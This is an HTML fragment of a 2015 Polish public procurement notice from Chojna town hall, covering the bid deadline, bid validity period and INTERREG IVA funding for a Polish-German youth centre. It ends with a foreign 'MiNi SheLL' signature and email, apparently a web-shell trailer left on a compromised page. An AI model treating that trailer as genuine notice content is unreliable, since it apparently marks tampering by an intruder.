<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.chojna.pl , zakładka: zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Chojnie
ul.Jagiellońska 4
74-500 Chojna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2015 godzina 09:30, miejsce: Urząd Miejski w Chojnie
ul.Jagiellońska 4
74-500 Chojna
pok.12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Polsko - Niemieckie Centrum ds. Młodzieży, Edukacji i komunikacji 
w związku gmin Oder-Welse - gminie Passow i gminie Pinnow oraz gminach
Chojna, Gryfino, Kołbaskowo, Stare Czarnowo i Wałcz wsparcie w 
ramach Programu Operacyjnego Celu 3 Europejska Współpraca 
terytorialna - Współpraca Transgraniczna Krajów Meklemburgia Pomorze
 Przednie  Brandenburgia i Rzeczypospolitej Polskiej (Województwo 
zachodniopomorskie) 2007-2013 INTERREG IVA.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com